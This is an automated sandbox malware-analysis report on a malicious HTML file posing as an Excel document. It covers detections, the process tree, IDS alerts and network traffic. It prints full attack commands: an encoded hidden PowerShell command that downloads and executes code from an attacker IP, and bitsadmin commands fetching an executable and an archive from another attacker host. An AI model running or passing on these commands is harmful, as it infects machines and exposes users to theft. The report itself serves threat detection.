Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
New xlsx docs074252657723824 - Tuesday, December 3, 2024 at 03_42_05 PM_html

Overview

General Information

Sample name:New xlsx docs074252657723824 - Tuesday, December 3, 2024 at 03_42_05 PM_html
Analysis ID:1573724
MD5:08db93d511d253f76db7c3b31c7b636e
SHA1:d7c9611167e2f1fe18c4f330c0424dbea080039d
SHA256:670ab3178e0574739e2422c42519ab8d171daaaee9b481da0730c236cd3001af
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detect drive by download via clipboard copy & paste
Malicious encrypted Powershell command line found
Multi AV Scanner detection for dropped file
AI detected suspicious Javascript
Encrypted powershell cmdline option found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Process Parents
Suspicious powershell command line found
Tries to download files via bitsadmin
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 4684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\New xlsx docs074252657723824 - Tuesday, December 3, 2024 at 03_42_05 PM_html.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6780 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1860,i,548011947270755985,424634908409210537,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 6852 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 3388 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Il.exe (PID: 2332 cmdline: "C:\l\Il.exe" MD5: AB1F884B6E9680A9F25E7517544DDC04)
      • PING.EXE (PID: 3044 cmdline: ping -n 1 8.8.8.8 MD5: B3624DD758CCECF93A1226CEF252CA12)
        • conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bitsadmin.exe (PID: 6808 cmdline: bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\user\AppData\Local\Temp\UnRAR.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
        • conhost.exe (PID: 3252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bitsadmin.exe (PID: 3484 cmdline: bitsadmin /transfer "DownloadArchive" /priority high "http://194.15.46.189/jstsolqx.rar" "C:\Users\user\AppData\Local\Temp\jstsolqx.rar" MD5: F57A03FA0E654B393BB078D1C60695F3)
        • conhost.exe (PID: 4932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, ProcessId: 3388, ProcessName: powershell.exe
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, ProcessId: 3388, ProcessName: powershell.exe
Sigma detected: Suspicious Process Parents
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\user\AppData\Local\Temp\UnRAR.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 6808, ParentProcessName: bitsadmin.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 3252, ProcessName: conhost.exe
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3388, TargetFilename: C:\l\Il.exe
Sigma detected: Suspicious Execution of Powershell with Base64
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, ProcessId: 3388, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==, ProcessId: 3388, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6852, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-12T14:38:00.983842+010028032742Potentially Bad Traffic192.168.2.1649742193.169.105.10380TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\l\Il.exeReversingLabs: Detection: 50%

Phishing

barindex
AI detected suspicious Javascript
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/New%20xlsx%20docs074... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and interaction with suspicious domains. The use of the 'atob' function to decode a base64-encoded string and execute it as PowerShell code is a significant security concern, as it allows for the execution of arbitrary remote code. Additionally, the script sends data to an external server at '193.169.105.103' without any transparency or user consent, which poses a risk of data exfiltration. Overall, the combination of these high-risk indicators suggests that this script is likely malicious and should be treated with caution.
Source: file:///C:/Users/user/Desktop/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.htmlHTTP Parser: Base64 decoded: powershell -windowstyle hidden -enc aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADMALgAxADYAOQAuADEAMAA1AC4AMQAwADMALwBpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkALgBjAG8AbgB0AGUAbgB0AA==
Source: file:///C:/Users/user/Desktop/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.htmlHTTP Parser: No favicon
Source: file:///C:/Users/user/Downloads/New%20xlsx%20docs074252657723824%20-%20Tuesday,%20December%203,%202024%20at%2003_42_05%20PM_html.htmlHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49726 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.147.5:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 28MB

Networking

barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\l\Il.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 8.8.8.8
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49742 -> 193.169.105.103:80
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: unknownTCP traffic detected without corresponding DNS query: 193.169.105.103
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 13:36:45 GMTServer: Apache/2.4.52 (Ubuntu)Access-Control-Allow-Origin: *Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 726Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 75 54 df 8f d3 38 10 7e 6e ff 8a 21 07 52 a2 6b 9c 84 b0 ab 23 24 bd 43 0b 48 48 48 20 01 0f 08 dd 83 71 a6 ad f7 1c 3b 67 bb bb 5b d0 fe ef 8c 9d b4 5d 1e 88 94 64 7e 79 e6 9b 99 2f 69 1f bd 7a 7f f5 e9 cb 87 d7 b0 f3 83 5a 2f db f0 02 c5 f5 b6 4b 50 27 c1 80 bc 5f 2f 17 ed 80 9e 83 d8 71 eb d0 77 c9 e7 4f 6f f2 bf 92 93 5d f3 01 bb e4 46 e2 ed 68 ac 4f 40 18 ed 51 53 dc ad ec fd ae eb f1 46 0a cc a3 b2 02 a9 a5 97 5c e5 4e 70 85 5d c5 ca 98 c7 4b af 70 dd 16 d3 9b 0c ce 1f 82 b0 5c 30 65 78 2f f5 b6 5a 2e 7e 2c 17 8b d1 38 3a 6f 74 03 1b 79 87 fd 0b 32 79 33 36 70 51 3e 09 b2 c2 8d 3f 29 de 72 ed 36 c6 0e 0d 44 51 71 8f 69 4e ce 15 84 67 16 62 36 84 35 77 f2 3b 36 f0 f4 d9 78 17 4c c2 28 63 1b f8 a3 ae eb a0 f6 d2 8d 8a 1f a8 a0 c2 e8 e7 4a 6e 75 2e 3d 0e ae 01 41 8d a2 0d e6 2d 27 18 55 19 73 dc 3f 04 0e cc 8d 52 6b b4 73 0b 71 10 e7 72 3b 94 db 9d 3f eb df 8c ed 91 ea 93 0a ce 28 d9 9f 90 4c 9e 3c f6 7b f6 c6 d6 46 6e 09 c8 83 20 4b b5 f7 ee 34 0a ae e5 c0 a7 b9 05 30 50 39 50 52 23 b7 b4 8f 4d 58 09 ce a8 ff f9 0f 0f 1b 4b 0b 75 31 70 42 5c 3e 81 1f f0 60 9a d6 f8 30 ca b2 c7 6d f6 02 ee 29 a2 2a 7f 13 53 5f 9e a3 28 7f 5b cc 8b 6d 9d b0 72 f4 e0 ac e8 92 9d f7 a3 6b 8a 42 98 1e d9 f5 ff 7b b4 07 26 cc 50 4c 62 5e b3 4b f6 8c 0d 52 b3 6b 97 10 49 a6 a3 94 a3 98 e8 d9 7e 33 fd 21 70 a5 ed e5 0d 08 c5 9d eb 92 e3 f4 03 bd 7e 71 1c 97 11 32 91 39 ba 69 7e 7a dd 3e ca 73 98 8f 31 c6 f2 3c 94 0a 0e 4a 3c 45 06 5e ce b5 03 75 f6 5a 84 91 82 ad ea 94 06 e6 f8 16 33 b2 87 89 2d 2c fa bd d5 30 9b 99 45 e2 90 c0 b4 f8 ca f3 ef ff 16 5b b9 02 85 9e 98 03 dd 1a 3e 7a 1b 4a 6e ac 19 ae e8 13 bb a2 29 a4 93 97 89 59 7f e9 d3 32 83 3f e1 68 f7 e6 9d b9 45 7b c5 1d a6 19 b4 1d 24 43 02 7f 43 55 43 03 79 55 67 59 24 f7 3d 04 9c 8f d3 de 88 fd 40 fc c8 08 07 ef 0f e9 11 79 7a 82 fb 98 f1 6b 7e 17 a4 34 ea 8b bd 55 0d c4 c5 d0 5e aa e7 35 ab 2e 9f b3 aa bc a0 bb 2e 68 13 e3 6e 4c 56 31 d2 ed 85 a0 2e e9 fb 38 66 ed b9 e7 59 f4 4d b9 08 41 12 56 94 64 6c c3 7b 7c bf f7 e9 45 b9 82 5f 50 9c 83 1f 44 87 df 51 1a a6 1b 33 4e a7 df 6a 3a 1c bb a3 eb 7e 16 02 05 67 25 3c c3 c2 ce 24 99 d8 41 64 89 ff b8 9f 20 17 1d 67 f4 04 00 00 Data Ascii: uT8~n!Rk#$CHHH q;g[]d~y/izZ/KP'_/qwOo]FhO@QSF\Np]Kp\0ex/Z.~,8:oty2y36pQ>?)r6DQqiNgb65w;6xL(cJnu.=A-'Us?Rksqr;?(L<{Fn K40P9PR#MXKu1pB\>`0m)*S_([mrkB{&PLb^KRkI~3!p~q29i~z>s1<J<E^uZ3-,0
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 13:36:46 GMTServer: Apache/2.4.52 (Ubuntu)Access-Control-Allow-Origin: *Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 6943Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 7b db 92 a3 ca 96 d8 f3 9e 88 f9 07 4d 1d 1f 47 f7 51 57 81 40 20 a9 77 75 db 48 20 90 10 17 81 00 49 0e 87 03 10 37 81 b8 24 17 01 13 3b c2 61 7f 80 1f fd e6 6f 98 98 f0 83 63 6c 87 7f 61 9f 5f f0 97 38 75 ab 52 55 5f ce 19 db 52 17 82 cc 75 5f 2b 57 ae 24 b3 9f ff 6e 39 96 d9 c5 44 e9 94 5e db 7c fd db bf 79 3e fd 76 9a d8 2c be 3c 00 f3 e1 dc 02 e2 0c fe 76 e0 e7 b9 05 5e dc 49 cb d8 71 81 f7 e5 81 63 d5 c7 e1 c3 9b 3e 33 6e c1 97 87 a0 02 7b db 72 bc 87 4e 6a 99 1e 30 21 ec be ca bc f2 4b 06 82 2a 05 8f e7 87 4f 9d ca ac bc 2a 6e 1e dd 34 6e c0 97 de 13 fa 42 cb ab bc 06 7c 7d 46 2e bf 7f fb 37 bf 3c 37 95 59 77 1c d0 7c 79 70 bd a8 01 6e 09 00 24 5f 3a 20 ff f2 50 7a 9e ed 7e 46 10 df 05 4f 39 64 18 ef 81 6b b5 e0 29 b5 5a 04 a2 80 d8 05 2e 12 90 4f e4 13 8a a4 ae 8b c4 4d f3 04 7f 1f ce 84 dd d4 a9 6c af e3 3a e9 2b a1 d4 ca c0 d3 71 e7 03 27 3a 13 b9 dc 3e e2 4f 83 a7 de 53 5b 99 4f 47 88 fc 8c 5c 50 6f 32 9f e5 82 0f 90 e8 2f 7f 3a 5d fe fe 74 f9 a5 8d 9d a2 32 3f 77 d0 5f cf 8f 76 9c 65 95 59 bc 3c 27 56 f8 e8 56 87 73 53 62 39 19 70 1e 61 d3 b9 ef b7 0b ad 93 47 3e c1 be 2c 7a 25 5a 82 aa 28 bd cf 9d 1e 8a fe f1 42 e7 a4 f7 63 1e b7 55 13 7d ee 88 0e 34 eb a7 8e 1b 9b ee a3 0b 9c 2a bf a7 f7 96 52 12 a7 75 e1 58 be 99 3d a6 56 63 39 9f 3b 7f 00 d9 e9 7b 21 9b 55 ae dd c4 90 64 de 80 f0 ca 09 de 3d 66 95 03 52 af b2 a0 62 10 cd 6f cd 4b df d1 77 bd 2a 8f 1e af 6e 87 9d f0 0a 9c 4b 67 dc 54 85 f9 58 79 a0 75 df 76 dc 69 13 94 f7 a2 3e 9d e8 c4 95 09 9c 57 81 ff 5f 25 72 ed 18 46 60 02 bc 3d 00 57 98 73 38 de 1b b3 8d c3 c7 5b 23 86 a2 76 f8 ce 77 d8 4b 93 07 42 ef f1 ac d8 5b 95 ae b6 dc 97 50 dd 37 1a 35 56 61 7d ea c0 30 b5 bc 7b ad ce 2a b8 a5 03 a3 fc 16 1a f7 18 ef c3 e9 d1 b3 ec 3b 31 6e a0 ef a9 de 3c 8a 9e 3f bf de 13 48 2c cf b3 da ef d0 b8 1a ea a7 06 ff a1 27 7f ea ff b3 8e 30 d6 f6 d0 aa 6f 59 9e 81 4e 71 ff ca f5 3b b6 fe 36 54 5f cd 7b 53 35 69 20 d0 a5 05 f9 d3 6d 40 39 71 56 f9 ee c9 c1 90 54 e7 4f c8 eb c0 2b e3 ec 24 0e da e9 db 61 67 08 ff 9c 22 89 3f a0 9f 3a d7 7f 4f d8 c7 37 21 d2 7f 0d 86 bb a0 bd 35 7d c7 52 7f 4d f8 fd d0 9a b6 e5 56 97 88 86 59 2c f6 aa e0 6d 28 a5 25 48 eb 93 1a 7f dd 28 f9 ff c7 06 26 6e db bf 8b 90 6b 48 39 37 83 dc ec 71 35 1a fe 8d cd f0 6f 82 ee 5b 1e 4d 9c 80 e6 95 c7 e1 b1 32 33 10 be 0f 9d d3 e0 f8 9e fe f7 e3 f2 2c d7 4f b0 3a 55 5b bc 62 de c6 7d ef 5b a9 f1 77 52 bf 23 63 df 0d e7 53 36 86 69 1d 9c 08 dd e8 dc 8d c6 7b 32 f1 77 c7 eb 5d 7a c9 40 6a 39 f1 c5 43 a6 65 be cf 27 71 76 af f8 25 e4 3f 9f 03 da b5 9a 2a eb fc 21 c7 4f df 5f ef ba 